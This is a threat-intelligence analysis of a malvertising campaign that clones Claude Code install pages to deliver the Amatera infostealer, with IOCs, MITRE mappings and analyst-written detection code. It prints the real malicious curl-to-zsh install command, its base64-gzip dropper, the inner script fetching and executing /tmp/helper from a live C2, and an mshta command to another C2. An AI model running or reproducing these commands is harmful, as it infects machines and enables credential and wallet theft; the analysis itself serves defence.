InstallFix: Dissecting a Multi-Stage Infostealer Campaign Hiding Behind Fake Claude Code Installers
Published: 2026-03-08
Severity: High
Malware Family: Amatera Stealer (ACR Stealer / AcridRain lineage)
Campaign: InstallFix (ClickFix variant)
Status: C2 actively serving payloads at time of publication
TL;DR
A malvertising campaign is exploiting Google Ads to serve pixel-perfect clones of Claude Code installation pages via Squarespace and Cloudflare Pages. Victims who copy the displayed install command unknowingly execute a multi-stage loader that delivers Amatera Stealer -- a $199-$1,499/year MaaS infostealer positioned as Lumma's successor. The macOS variant uses a fileless pipe-based execution chain from an unsigned universal Mach-O binary; the Windows variant chains 7 layers of fileless execution through mshta.exe, .NET deserialization gadgets, and reflective PE loading with direct SYSENTER syscalls.
Campaign Overview
The InstallFix campaign targets developers searching for "Claude Code install" or "Claude Code CLI" on Google. Sponsored results direct victims to lure pages hosted on trusted platforms -- Squarespace, Cloudflare Pages, and Tencent EdgeOne -- that mirror the official Claude Code documentation down to sidebar navigation and branding. Every non-install link on the fake page redirects to legitimate anthropic.com URLs, so the victim's post-infection browsing experience appears normal.
This is a pure malvertising play. No email vector, no phishing links. The attack surface is the search engine results page itself.
Lure Infrastructure
The operators rotate lure domains across legitimate hosting platforms to inherit trust and dodge domain-reputation blocklists:
| Domain | Platform | Status |
|---|---|---|
| claude-code-cmd[.]squarespace[.]com | Squarespace | DOWN (404) |
| claude-code-install[.]squarespace[.]com | Squarespace | Resolving |
| claudecode-developers[.]squarespace[.]com | Squarespace | Resolving |
| claulastver[.]squarespace[.]com | Squarespace | Unknown |
| claud-code[.]pages[.]dev | Cloudflare Pages | 403 |
| claude-code-docs-site[.]pages[.]dev | Cloudflare Pages | Unknown |
| claude-code-macos[.]com | Cloudflare | 403 |
| myclauda[.]it[.]com | Unknown | Unknown |
| vdsafsaf[.]it[.]com | Unknown | Unknown |
Squarespace and Cloudflare Pages handle SSL at the platform level, so no custom certificate issuance appears in CT logs -- eliminating a common hunting vector.
C2 Infrastructure
Primary C2: contatoplus[.]com -- LIVE
The primary C2 was registered on 2026-02-23 via Hello Internet Corp (hello.co). It sits behind Cloudflare (AS13335) running nginx, with a Let's Encrypt wildcard certificate. The domain was previously owned (GoDaddy certificates appear in CT logs from March 2025), then re-registered to inherit aged domain reputation and bypass new-domain blocklists.
No email infrastructure exists on this domain (no MX, SPF, DKIM, or DMARC records) -- it exists solely for payload delivery.
Critical evasion: User-Agent filtering. The C2 only serves payloads when the request's User-Agent header contains the case-sensitive substring curl/:
$ curl -s -o /dev/null -w "%{http_code}" https://contatoplus[.]com/n8n/update
200
$ curl -s -o /dev/null -w "%{http_code}" -A "Mozilla/5.0" https://contatoplus[.]com/n8n/update
404
$ curl -s -o /dev/null -w "%{http_code}" -A "CURL" https://contatoplus[.]com/n8n/update
404
The match is case-sensitive (a User-Agent of CURL returns 404) and substring-based (a User-Agent of test curl/test returns 200). This renders the C2 invisible to browser-based URL scanners, automated crawlers, wget, python-requests, and most OSINT tooling, none of which send a curl/ User-Agent by default.
Payload Mutation
During a 30-minute observation window, the macOS Mach-O binary served from /n8n/update mutated:
| Time (UTC) | Size | SHA256 |
|---|---|---|
| ~02:14 | 6,449,464 bytes | 17a46b70be102d72b47fc81eed76b3684f0583058b78175122657bb3438bc8dc |
| ~02:45 | 17,929,080 bytes | 672e00036b13530c236fa98f5046844965f0a0515861f03c5e1d67b73225773e |
The binary nearly tripled in size within 30 minutes. This is active, real-time development and deployment -- not a scheduled rotation.
Infrastructure Correlation
Two domains share identical Cloudflare nameservers (amir.ns.cloudflare.com + gigi.ns.cloudflare.com), meaning they sit in the same Cloudflare account:
- claude-code-macos[.]com -- registered via NiceNIC (Hong Kong)
- update-version[.]com -- registered via NiceNIC (Hong Kong)
Both were created within days of each other. This definitively ties the macOS lure domain to the Windows C2 infrastructure under one operator.
macOS Kill Chain
Stage 1: Poisoned Install Command
The lure page presents what appears to be a standard curl | sh install command. The actual payload:
curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh
The base64 decodes to:
https://contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
The hash in the URL path does not match the file hash -- it functions as a campaign or victim tracking identifier.
Stage 2: Compressed Zsh Dropper (229 bytes)
The fetched script is a gzip-compressed, base64-encoded zsh dropper:
#!/bin/zsh
yujdlp=$(base64 -D <<'PAYLOAD_END' | gunzip
H4sIAJZGnGkC/13LQQqAIBBA0X2nmAjchM02uo1NgoE6g44gnb6W1fI/+NOI+5nxqmGgViJYBtQk
GHwUXyCoSt0QibM6ZYmtLsQJ85qxyeHUgzHQnWoBS5/1cQqJD5j731853JG28ZGBAAAA
PAYLOAD_END
)
eval "$yujdlp"
SHA256: a48551015047792184589c132ec394b82cf4938642e50424369eb4a1fe9348f8
Stage 3: Inner Script
The decompressed payload is minimal:
#!/bin/zsh
curl -o /tmp/helper https://contatoplus.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
Three operations: download binary, strip Gatekeeper quarantine attributes (xattr -c, T1553.001), execute.
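Stages 2 and 3 above are usually triaged by letting the dropper run; the helper below, added here as an example rather than the campaign's code, instead recovers the inner script statically by reading the heredoc, base64-decoding and gunzipping it, and then lists the indicators the inner script exposes (URL fetched, output path, xattr -c, chmod +x). The sample dropper is constructed inline with a placeholder domain and the name PAYLOAD_END is taken from the observed script.

```python
import base64
import gzip
import re

# Analyst helper constructed for this write-up (not the campaign's code): it
# recovers the inner script from a base64+gzip heredoc dropper WITHOUT running
# the eval, then pulls out the indicators Stage 3 exposes.
HEREDOC_RE = re.compile(
    r"base64\s+-[dD]\s*<<'?(?P<tag>\w+)'?\s*\|\s*gunzip[^\n]*\n"
    r"(?P<body>.*?)\n(?P=tag)[ \t]*$",
    re.S | re.M,
)

def decode_dropper(script):
    """Return the decompressed inner script carried by the heredoc."""
    m = HEREDOC_RE.search(script)
    if not m:
        raise ValueError("no base64 | gunzip heredoc found")
    raw = base64.b64decode("".join(m.group("body").split()))
    return gzip.decompress(raw).decode("utf-8", errors="replace")

def triage(inner):
    """Summarise what the inner script does: URLs fetched, files written,
    Gatekeeper quarantine stripping (xattr -c), and paths made executable."""
    return {
        "urls": re.findall(r"https?://[^\s'\"&|;]+", inner),
        "outputs": re.findall(r"-o\s+(\S+)", inner),
        "quarantine_strip": bool(re.search(r"\bxattr\s+-c\b", inner)),
        "chmod_x": re.findall(r"chmod\s+\+x\s+(\S+)", inner),
    }

# Constructed sample: the inner script is wrapped the way the observed dropper
# is (gzip, base64, heredoc, eval). The domain is a placeholder.
INNER_SCRIPT = (
    "#!/bin/zsh\n"
    "curl -o /tmp/helper https://c2.example.invalid/n8n/update && "
    "xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper\n"
)
_blob = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
SAMPLE_DROPPER = "#!/bin/zsh\nx=$(base64 -D <<'PAYLOAD_END' | gunzip\n%s\nPAYLOAD_END\n)\neval \"$x\"\n" % (
    "\n".join(_blob[i:i + 76] for i in range(0, len(_blob), 76)))

if __name__ == "__main__":
    recovered = decode_dropper(SAMPLE_DROPPER)
    print(recovered)
    print(triage(recovered))
```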
Stage 4: Amatera Mach-O Binary
The final payload is an unsigned universal Mach-O binary (x86_64 + arm64) compiled with the macOS 26.2.0 SDK (Xcode/Tahoe, March 2026). It links only two system libraries (libc++.1.dylib, libSystem.B.dylib) and imports exactly 22 functions:
fork, execl, execvp, pipe, dup2, write, close, waitpid, usleep, abort, _exit,
memcpy, memmove, bzero, std::string::append, std::string::reserve,
std::string::push_back, std::string::operator=, std::__next_prime
No networking APIs. No Objective-C. No frameworks. This binary's sole purpose is to decode and execute an embedded script.
Obfuscation profile:
| Technique | Detail |
|---|---|
| Fully stripped symbols | All 28 symbol table entries + 584-byte string table zeroed |
| Encrypted strings | __cstring section encoded; strings built at runtime via MOV immediate |
| Encrypted payload | 2.75 MB in __const -- arrays of uint16 values (0x0000-0x0400) |
| Constructor-based entry | main() is a no-op; real entry via __mod_init_func |
| Only plaintext strings | /bin/bash and -s (assembled char-by-char in registers) |
Execution flow (fileless):
- Constructor decodes the 2.75 MB embedded script from __const word tables using __cstring keys
- pipe() creates an IPC channel
- fork() creates a child process
- Parent writes the decoded bash script to the pipe via write()
- Child redirects stdin with dup2(), then calls execl("/bin/bash", "bash", "-s", NULL)
- The bash script executes entirely in memory -- it never touches disk
- The decoded bash script contains the actual stealing logic: browser credential harvesting, keychain access, wallet extraction
Windows Kill Chain: 7-Layer Fileless Implant
The Windows variant achieves full execution without dropping a single file to disk, chaining 7 layers of in-memory techniques.
Stage 0: LOLBin Entry
C:\Windows\SysWOW64\mshta.exe https://claude[.]update-version[.]com/claude
The use of SysWOW64 (32-bit) mshta.exe is deliberate -- it enables WoW64 syscall evasion techniques later in the chain.
The 7 Layers
| Layer | Technique | Detail |
|---|---|---|
| 1 | mshta.exe LOLBin | Signed Microsoft binary proxies execution (T1218.005) |
| 2 | HTA/VBScript | 1,476,332 bytes, 531 lines, 6 polymorphic blocks, 100+ XOR stubs |
| 3 | .NET CLR Activation | Loads the CLR into mshta.exe's process space without spawning a new process |
| 4 | XAML gadget chain | BinaryFormatter.Deserialize() -> TextFormattingRunProperties -> disables ActivitySurrogateSelector type check |
| 5 | AxHost+State smuggling | Second deserialization loads a .NET PE entirely in memory |
| 6 | 3 .NET loader stubs | Each stub carries encrypted shellcode, deserialized into memory |
| 7 | Reflective PE loader | 105 KB shellcode maps a 326 KB native implant into memory |
The entire process tree is cmd.exe -> mshta.exe -> conhost.exe. Everything executes inside the mshta.exe process context.
Final Implant Characteristics
The reflectively loaded native implant (326,144 bytes, x86) imports only from KERNEL32.DLL and SECUR32.DLL; all other API resolution happens dynamically at runtime. Syscalls bypass EDR userland hooks entirely via direct SYSENTER instructions. C2 communications use custom SSPI-negotiated TLS with AES-256-GCM encryption and domain fronting behind facebook.com, with DNS-over-HTTPS as a fallback resolution mechanism.
Amatera Stealer Profile
Amatera is a Malware-as-a-Service infostealer sold by the threat actor "SheldIO" on Telegram. It descends from ACR Stealer (AcridRain) via GrMsk Stealer, and has been positioned as a Lumma Stealer replacement following Lumma's law enforcement disruption.
| Attribute | Value |
|---|---|
| Lineage | ACR Stealer (AcridRain) -> GrMsk Stealer -> Amatera |
| Author | SheldIO |
| MaaS pricing | $199/month -- $1,499/year |
| Microsoft detection | Trojan:Win32/Amatera.A!AMTB (published 2026-02-05) |
Exfiltration Targets
- Browser credentials, cookies, and session tokens (Chrome, Edge, Firefox, 7+ Chromium variants)
- Cryptocurrency wallets (MetaMask, Phantom, Exodus, and others)
- Messaging sessions (Telegram, Steam, Discord)
- Password manager browser extensions
- FTP client credentials and email service tokens
- Full system fingerprint (hostname, OS, CPU, locale, network configuration)
Evasion Stack
- macOS: Gatekeeper bypass (xattr -c), fileless pipe-to-bash execution, stripped/encrypted Mach-O
- Windows: WoW64 direct syscalls, NTSockets (kernel device \Device\Afd\Endpoint), AMSI + ETW bypass, PowerShell logging suppression, anti-sandbox/VM/debugger checks, dynamic API resolution with wildcard matching, domain fronting
- C2-level: User-Agent filtering (serves only to curl/), expired domain re-registration for reputation, Cloudflare fronting, payload mutation
Windows Persistence
- Registry Run key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run with names mimicking Microsoft services (e.g., "Microsoft Update")
- Mutex: AsyncMutex_6SI8OkPnk
- LOLBin persistence: SyncAppvPublishingServer.vbs (App-V signed script abuse)
Detection Guidance
Network-Based
- Alert on mshta.exe making outbound HTTPS connections to non-Microsoft domains
- Monitor for curl commands with base64-encoded URLs piped to shell interpreters (zsh, bash, sh)
- Block newly registered domains (<30 days) in developer tool installation contexts
- Flag curl/ User-Agent requests to non-standard domains with /n8n/ or /curl/ URL path segments
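The two detections above that are easiest to get wrong are the base64-hidden installer command and the User-Agent/path pattern, so here is an added example (not from the original write-up or any vendor) that implements both: one function decodes the URL out of a curl one-liner only when the decoded data is actually piped into zsh, bash or sh (both macOS base64 -D and GNU base64 -d are accepted), and the other scans tab-separated proxy records for a curl/ substring User-Agent fetching a /n8n/ or /curl/ path from a host outside a small allowlist. The allowlist, the log format and the c2.example.invalid domain are constructed for the example.

```python
import base64
import re
import shlex
from urllib.parse import urlparse

# Detection helpers constructed for this write-up; not the campaign's or any
# vendor's code. Host allowlist and sample data below are illustrative.
SHELLS = {"zsh", "bash", "sh"}
SUSPICIOUS_PATHS = ("/n8n/", "/curl/")
ALLOWED_HOSTS = {"github.com", "raw.githubusercontent.com"}  # constructed allowlist
B64_ECHO_RE = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*base64\s+-[dD]\b")

def decode_installer_command(cmd):
    """If cmd is a curl one-liner that hides its URL in base64 and pipes the
    result into a shell interpreter, return the decoded URL; otherwise None."""
    m = B64_ECHO_RE.search(cmd)
    if not m:
        return None
    stages = [s.strip() for s in cmd.split("|")]
    sink = shlex.split(stages[-1]) if stages[-1] else []
    if not sink or sink[0].rsplit("/", 1)[-1] not in SHELLS:
        return None  # decoded data is not fed to zsh/bash/sh
    try:
        return base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def flag_c2_fetches(log_lines):
    """Scan tab-separated proxy records (client, method, url, user_agent) and
    return URLs matching the C2's serving pattern: a User-Agent containing the
    substring 'curl/' plus a /n8n/ or /curl/ path on a non-allowlisted host."""
    hits = []
    for line in log_lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 4:
            continue
        url, ua = fields[2], fields[3]
        parsed = urlparse(url)
        if parsed.hostname in ALLOWED_HOSTS or "curl/" not in ua:
            continue
        if any(seg in parsed.path for seg in SUSPICIOUS_PATHS):
            hits.append(url)
    return hits

# Constructed sample input (placeholder domain, not a real indicator).
SAMPLE_URL = "https://c2.example.invalid/curl/PLACEHOLDER"
SAMPLE_CMD = "curl -ksfLS $(echo '%s'|base64 -D)| zsh" % (
    base64.b64encode(SAMPLE_URL.encode()).decode())
SAMPLE_LOG = [
    "10.0.0.5\tGET\thttps://c2.example.invalid/n8n/update\tcurl/8.4.0",
    "10.0.0.5\tGET\thttps://c2.example.invalid/n8n/update\tMozilla/5.0",
    "10.0.0.7\tGET\thttps://github.com/curl/curl\tcurl/8.4.0",
    "10.0.0.9\tGET\thttps://c2.example.invalid/curl/PLACEHOLDER\ttest curl/test",
]

if __name__ == "__main__":
    print(decode_installer_command(SAMPLE_CMD))
    print(flag_c2_fetches(SAMPLE_LOG))
```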
Host-Based -- macOS
- xattr -c followed by execution of any binary in /tmp/
- Creation and execution of /tmp/helper
- bash -s or zsh -s (stdin script execution) spawned by unknown parent binaries
- Unsigned Mach-O universal binaries with minimal imports matching the fork+pipe+exec pattern
Host-Based -- Windows
- mshta.exe spawned by cmd.exe with URL parameters pointing to newly registered domains
- mshta.exe loading .NET CLR libraries (clr.dll, mscorlib.dll) -- this is anomalous behavior
- BinaryFormatter.Deserialize calls originating from an mshta.exe process context
- SyncAppvPublishingServer.vbs execution outside of legitimate App-V management workflows
- Processes with minimal import tables issuing direct SYSENTER syscalls
- Registry Run key additions at HKCU\...\Run mimicking Microsoft service names
- conhost.exe spawned as a direct child of mshta.exe
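Several of the Windows host-based indicators above are simple process, image-load and registry conditions, so the following added example (not part of the original write-up or any vendor's product) expresses them as rules over simplified Sysmon-style event records and runs them against constructed events, including two benign controls (a local .hta opened from Explorer and PowerShell loading the CLR) that should not fire. The event schema, rule names and hta.example.invalid domain are assumptions for the example.

```python
import ntpath

# Host-telemetry rules constructed for this write-up (not vendor or campaign
# code), run over simplified Sysmon-style events built inline below.
CLR_IMAGES = {"clr.dll", "mscorlib.dll"}
RUN_KEY_SUFFIX = r"\software\microsoft\windows\currentversion\run"

def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()

def evaluate(event):
    """Return the names of every rule this single event trips."""
    hits = []
    kind = event.get("event")
    image = _base(event.get("image"))
    parent = _base(event.get("parent_image"))
    cmd = (event.get("cmdline") or "").lower()
    if kind == "ProcessCreate":
        if image == "mshta.exe" and parent == "cmd.exe" and "http" in cmd:
            hits.append("mshta_url_from_cmd")
        if image == "conhost.exe" and parent == "mshta.exe":
            hits.append("conhost_child_of_mshta")
        if "syncappvpublishingserver.vbs" in cmd:
            hits.append("appv_script_abuse")
    elif kind == "ImageLoad":
        # mshta.exe has no business hosting the .NET CLR.
        if image == "mshta.exe" and _base(event.get("loaded")) in CLR_IMAGES:
            hits.append("mshta_loads_clr")
    elif kind == "RegistryValueSet":
        key = (event.get("key") or "").lower()
        name = (event.get("name") or "").lower()
        if key.startswith("hkcu") and key.endswith(RUN_KEY_SUFFIX) and "microsoft" in name:
            hits.append("run_key_microsoft_lookalike")  # needs triage; not all are malicious
    return hits

def scan(events):
    """Evaluate a stream of events; returns (event_index, rule) pairs."""
    return [(i, r) for i, ev in enumerate(events) for r in evaluate(ev)]

# Constructed events; hta.example.invalid is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\SysWOW64\mshta.exe https://hta.example.invalid/claude"},
    {"event": "ImageLoad", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "loaded": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\conhost.exe",
     "parent_image": r"C:\Windows\SysWOW64\mshta.exe", "cmdline": "conhost.exe 0x4"},
    {"event": "RegistryValueSet", "image": r"C:\Windows\SysWOW64\mshta.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Microsoft Update"},
    # Benign controls: a local .hta opened from Explorer, PowerShell loading the CLR.
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"mshta.exe C:\Tools\report.hta"},
    {"event": "ImageLoad", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(idx, rule)
```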
MITRE ATT&CK Mapping
| ID | Technique | Platform |
|---|---|---|
| T1583.001 | Acquire Infrastructure: Domains | Both |
| T1583.006 | Acquire Infrastructure: Web Services | Both |
| T1608.005 | Stage Capabilities: Link Target (malvertising) | Both |
| T1204.001 | User Execution: Malicious Link | Both |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Windows |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | macOS |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | Windows |
| T1218.005 | System Binary Proxy Execution: Mshta | Windows |
| T1553.001 | Subvert Trust Controls: Gatekeeper Bypass | macOS |
| T1027 | Obfuscated Files or Information | Both |
| T1140 | Deobfuscate/Decode Files or Information | Both |
| T1055 | Process Injection | Both |
| T1106 | Native API | Both |
| T1547.001 | Boot/Logon Autostart: Registry Run Keys | Windows |
| T1071.001 | Application Layer Protocol: Web Protocols | Both |
| T1090 | Proxy: Domain Fronting | Windows |
| T1555.003 | Credentials from Web Browsers | Both |
| T1539 | Steal Web Session Cookie | Both |
| T1005 | Data from Local System | Both |
| T1082 | System Information Discovery | Both |
| T1497 | Virtualization/Sandbox Evasion | Windows |
IOCs
File Hashes (SHA256)
| Hash | Description |
|---|---|
| a48551015047792184589c132ec394b82cf4938642e50424369eb4a1fe9348f8 | macOS Stage 1 zsh dropper (229 bytes) |
| 17a46b70be102d72b47fc81eed76b3684f0583058b78175122657bb3438bc8dc | macOS Mach-O universal binary (6.15 MB) |
| 672e00036b13530c236fa98f5046844965f0a0515861f03c5e1d67b73225773e | macOS Mach-O mutated variant (17.9 MB) |
| 57529656f02ecea388f45acc37fa94dd668047d3ef1f4d42bca94894ff07632c | Windows native implant (326 KB) |
| bd756859dcb3c22fa2325d456b84ca368b98db7aa85617551795b34939691061 | Windows shellcode -- reflective PE loader |
| 254bda6f4ca8cd1a7a3b677a305e8710c431ca47d78498949241547f516456f9 | XAML deserialization bypass payload |
| f03cc1d8b53d4c931e2f62dc0c39b0bd3313ce491fb022432150dc7356a5dc13 | .NET loader stub #1 |
| 7cdb09b9678031e317cdbb5e2450eb676501579a0621f46cdfcd27e67fe57e09 | .NET loader stub #2 |
| b30fa9d3953803d818a8c64d7ab682ba06b9caa85c2821f07b3a8fb93ca6f843 | .NET loader stub #3 |
| 975e739cd196fa1466bf28498de3ea779d11cce6699871c21d0ec0fd7964d14d | "Claude Setup.exe" trojanized installer (Golang) |
| f709d35e070a1b74f9465149226edf3debbce18c544e3cfca28caf82a82e20bb | verification.msi -- drops clipx.exe |
| 73fd51d4a0959e5c5a82db9be0d765069d02a2b97f51f55f5d6422a7bec01caa | Amatera sample (Malpedia reference) |
File Hashes (MD5 / SHA1)
| Hash | Type | Description |
|---|---|---|
| a587d743e7391dda633e7e7fabb84a24 | MD5 | macOS Stage 1 dropper |
| 3f21d40d4e8b2398f9ae8ae7ce960cad | MD5 | macOS Mach-O sample 1 |
| 7454a6475551a9f6f55f4eca639e76f9 | MD5 | macOS Mach-O sample 2 |
| dc7af79d157db4aa1516e5235dfa4d0854423c36 | SHA1 | macOS Mach-O sample 1 |
Mach-O UUIDs
bf04d849-26f1-3d1f-9b07-cfe836e67000 (x86_64)
7a5e2d70-43f8-3fb6-861d-156a7d7e55ef (arm64)
Domains
| Domain | Role |
|---|---|
| contatoplus[.]com | macOS C2 / payload delivery (LIVE) |
| claude[.]update-version[.]com | Windows C2 / HTA delivery |
| update-version[.]com | Windows parent domain |
| sarahmoftah[.]com | Alternate C2 |
| claude-code-macos[.]com | Lure / payload |
| claud-clients[.]com | MSI delivery |
| wriconsult[.]com | Malware delivery |
| amaprox[.]icu | Amatera C2 |
| talismanoverblown[.]com | Amatera C2 |
| claude-code-cmd[.]squarespace[.]com | Lure page |
| claude-code-install[.]squarespace[.]com | Lure page |
| claudecode-developers[.]squarespace[.]com | Lure page |
| claulastver[.]squarespace[.]com | Lure page |
| claud-code[.]pages[.]dev | Lure page |
| claude-code-docs-site[.]pages[.]dev | Lure page |
Payload URLs
hxxps://contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
hxxps://contatoplus[.]com/n8n/update
hxxps://claude[.]update-version[.]com/claude
hxxps://sarahmoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420
IP Addresses
| IP | ASN | Role |
|---|---|---|
| 104.21.32.228 | AS13335 (Cloudflare) | contatoplus[.]com C2 |
| 172.67.156.82 | AS13335 (Cloudflare) | contatoplus[.]com C2 |
| 198.185.159.176-177 | AS53831 (Squarespace) | Lure hosting |
| 198.49.23.176-177 | AS53831 (Squarespace) | Lure hosting |
| 172.67.129.152 | AS13335 (Cloudflare) | claude-code-macos[.]com |
| 104.21.2.196 | AS13335 (Cloudflare) | claude-code-macos[.]com |
| 188.114.96.3 | Cloudflare | claud-clients[.]com |
| 188.114.97.3 | Cloudflare | claud-clients[.]com |
| 91.98.229.246 | AS24940 (Hetzner) | Amatera C2 |
| 87.120.219.26 | Global Connectivity Solutions | Amatera C2 |
| 45.94.47.224 | Hosting Industry Limited | Amatera C2 |
SSL Certificate Serials
061feb2e8329c5622e643116c9ebc473bad5 (Let's Encrypt E7, contatoplus.com)
0ba7ae1d49de501447bb77a856db564f (Sectigo/Cloudflare, contatoplus.com)
Host Artifacts
| Type | Value |
|---|---|
| File | /tmp/helper (macOS) |
| Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run (deceptive names) |
| Mutex | AsyncMutex_6SI8OkPnk |
References
- BleepingComputer: Fake Claude Code install guides push infostealers
- Push Security: InstallFix
- Maurice Fielenbach: Paste With Caution
- Proofpoint: Amatera Stealer
- Blackpoint: Fake CAPTCHA Delivering Amatera
- Microsoft: Trojan:Win32/Amatera.A!AMTB
- Malpedia: win.amatera
- eSentire: EVALUSION Campaign
- ANY.RUN: Claude Setup.exe analysis
- VenzoV: Amatera Stealer v1 Analysis
- AdGuard: Claude-linked Google ads dupe macOS users